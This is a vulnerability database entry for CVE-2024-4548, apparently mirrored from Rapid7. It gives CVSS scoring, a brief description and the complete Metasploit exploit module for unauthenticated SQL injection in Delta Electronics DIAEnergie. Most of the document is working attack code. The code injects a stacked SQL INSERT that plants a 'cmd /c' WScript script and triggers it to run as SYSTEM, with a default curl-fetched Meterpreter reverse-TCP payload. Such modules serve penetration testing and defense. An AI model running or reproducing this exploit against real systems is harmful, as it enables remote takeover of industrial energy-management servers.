DIAEnergie SQL Injection (CVE-2024-4548)

2024-07-3017:28:10

Michael Heinzl, Tenable

www.rapid7.com

sql injection

diaenergie

delta electronics

remote attacker

arbitrary code execution

unauthenticated

vulnerability

CVSS3

9.8

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

AI Score

Confidence

Low

EPSS

0.003

Percentile

69.6%

JSON

SQL injection vulnerability in DIAEnergie <= v1.10 from Delta Electronics. This vulnerability can be exploited by an unauthenticated remote attacker to gain arbitrary code execution through a SQL injection vulnerability in the CEBC service. The commands will get executed in the context of NT AUTHORITY\SYSTEM.

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking
  include Msf::Exploit::Remote::Tcp
  prepend Msf::Exploit::Remote::AutoCheck

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'DIAEnergie SQL Injection (CVE-2024-4548)',
        'Description' => %q{
          SQL injection vulnerability in DIAEnergie <= v1.10 from Delta Electronics.
          This vulnerability can be exploited by an unauthenticated remote attacker to gain arbitrary code execution through a SQL injection vulnerability in the CEBC service. The commands will get executed in the context of NT AUTHORITY\SYSTEM.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'Michael Heinzl', # MSF exploit
          'Tenable' # Discovery & PoC
        ],
        'References' => [
          [ 'URL', 'https://www.tenable.com/security/research/tra-2024-13'],
          [ 'CVE', '2024-4548']
        ],
        'DisclosureDate' => '2024-05-06',
        'Platform' => 'win',
        'Arch' => [ ARCH_CMD ],
        'Targets' => [
          [
            'Windows_Fetch',
            {
              'Arch' => [ ARCH_CMD ],
              'Platform' => 'win',
              'DefaultOptions' => {
                'FETCH_COMMAND' => 'CURL',
                'PAYLOAD' => 'cmd/windows/http/x64/meterpreter/reverse_tcp'
              },
              'Type' => :win_fetch
            }
          ]
        ],
        'DefaultTarget' => 0,

        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => [IOC_IN_LOGS]
        }
      )
    )

    register_options(
      [
        Opt::RPORT(928)
      ]
    )
  end

  # Determine if the DIAEnergie version is vulnerable
  def check
    begin
      connect
      sock.put 'Who is it?'
      res = sock.get || ''
    rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e
      vprint_error(e.message)
      return Exploit::CheckCode::Unknown
    ensure
      disconnect
    end

    if res.empty?
      vprint_status('Received an empty response.')
      return Exploit::CheckCode::Unknown
    end

    vprint_status('Who is it response: ' + res.to_s)
    version_pattern = /\b\d+\.\d+\.\d+\.\d+\b/
    version = res.match(version_pattern)

    if version[0].nil?
      Exploit::CheckCode::Detected
    end

    vprint_status('Version retrieved: ' + version[0])

    unless Rex::Version.new(version) <= Rex::Version.new('1.10.1.8610')
      return CheckCode::Safe
    end

    return CheckCode::Appears
  end

  def exploit
    execute_command(payload.encoded)
  end

  def execute_command(cmd)
    scname = Rex::Text.rand_text_alphanumeric(5..10).to_s
    vprint_status('Using random script name: ' + scname)

    year = rand(2024..2026)
    month = sprintf('%02d', rand(1..12))
    day = sprintf('%02d', rand(1..29))
    random_date = "#{year}-#{month}-#{day}"
    vprint_status('Using random date: ' + random_date)

    hour = sprintf('%02d', rand(0..23))
    minute = sprintf('%02d', rand(0..59))
    second = sprintf('%02d', rand(0..59))
    random_time = "#{hour}:#{minute}:#{second}"
    vprint_status('Using random time: ' + random_time)

    # Inject payload
    begin
      print_status('Sending SQL injection...')
      connect
      vprint_status("RecalculateHDMWYC~#{random_date} #{random_time}~#{random_date} #{random_time}~1);INSERT INTO DIAEnergie.dbo.DIAE_script (name, script, kid, cm) VALUES(N'#{scname}', N'CreateObject(\"WScript.shell\").run(\"cmd /c #{cmd}\")', N'', N'');--")
      sock.put "RecalculateHDMWYC~#{random_date} #{random_time}~#{random_date} #{random_time}~1);INSERT INTO DIAEnergie.dbo.DIAE_script (name, script, kid, cm) VALUES(N'#{scname}', N'CreateObject(\"WScript.shell\").run(\"cmd /c #{cmd}\")', N'', N'');--"
      res = sock.get
      unless res.to_s == 'RecalculateHDMWYC Fail! The expression has too many closing parentheses.'
        fail_with(Failure::UnexpectedReply, 'Unexpected reply from the server received: ' + res.to_s)
      end

      vprint_status('Injection - Expected response received: ' + res.to_s)
      disconnect

      # Trigger
      print_status('Triggering script execution...')
      connect
      sock.put "RecalculateScript~#{random_date} #{random_time}~#{random_date} #{random_time}~1"
      res = sock.get
      unless res.to_s == 'Recalculate Script Start!'
        fail_with(Failure::UnexpectedReply, 'Unexpected reply from the server received: ' + res.to_s)
      end
      vprint_status('Trigger - Expected response received: ' + res.to_s)

      disconnect

      print_good('Script successfully injected, check thy shell.')
    ensure
      # Cleanup
      print_status('Cleaning up database...')
      connect
      sock.put "RecalculateHDMWYC~2024-02-04 00:00:00~2024-02-05 00:00:00~1);DELETE FROM DIAEnergie.dbo.DIAE_script WHERE name='#{scname}';--"
      res = sock.get
      unless res.to_s == 'RecalculateHDMWYC Fail! The expression has too many closing parentheses.'
        fail_with(Failure::UnexpectedReply, 'Unexpected reply from the server received: ' + res.to_s)
      end
      vprint_status('Cleanup - Expected response received: ' + res.to_s)

      disconnect
    end
  end
end